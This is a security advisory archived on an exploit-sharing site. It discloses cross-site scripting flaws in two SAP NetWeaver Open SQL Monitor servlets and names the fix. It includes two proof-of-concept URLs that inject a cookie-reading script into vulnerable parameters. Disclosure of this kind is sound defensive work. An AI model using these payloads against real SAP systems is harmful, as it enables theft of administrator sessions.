exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SAP NetWeaver Administrator Panel ECC 6.0 Cross Site Scripting

SAP NetWeaver Administrator Panel ECC 6.0 Cross Site Scripting
Posted Nov 17, 2010
Authored by Sh2kerr, Alexey Troshichev | Site dsecrg.com

The SAP NetWeaver administrator panel from ECC version 6.0 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3d805721f30788cc734b4cca6025ed61f899f4240facd6d677bd99feb4a472b9

SAP NetWeaver Administrator Panel ECC 6.0 Cross Site Scripting

Change Mirror Download
Digital Security Research Group [DSecRG] Advisory


Application: SAP NetWeaver Administrator panel
Versions Affected: SAP NetWeaver Administrator panel from ECC 6.0
Vendor URL: http://SAP.com
Bugs: XSS
Exploits: YES
Reported: 07.09.2009
Vendor response: 08.09.2009
Date of Public Advisory: 09.11.2010
CVE-number:
Author: a.polyakov and a.troshichev from Digital Security Research
Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********

Open SQL Monitors (installed by default in port 50100) has linked multiple
XSS vulnerabilies.



Details
*******

1 Vulnerable script - ConnectionMonitorServlet

Vulnerable parameters: connid.

Attacker can send link to administrator and get his cookie.


2 Vulnerable script - CatalogBufferMonitorServlet

Vulnerable parameters: reqTableColumns

Attacker can send link to administrator and get his cookie.



Example:
********

http://172.16.0.222:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?view=stmtpool&node=12924950&ds=SAPSR3DB&connid
=com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script>

Example:
********

http://172.16.0.222:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId=
SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script>


References
**********

http://dsecrg.com/pages/vul/show.php?id=156
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1391770




Fix Information
***************

Solution for this issue given in security note 1391770.




About
*****

Digital Security is one of the leading IT security companies in CEMEA,
providing information security consulting, audit and penetration
testing services, ERP and SAP security assessment, certification for ISO/IEC
27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group focuses on enterprise application (ERP) and
database
security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.

Contact: research [at] dsecrg [dot]com
http://www.dsecrg.com
http://www.erpscan.com
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close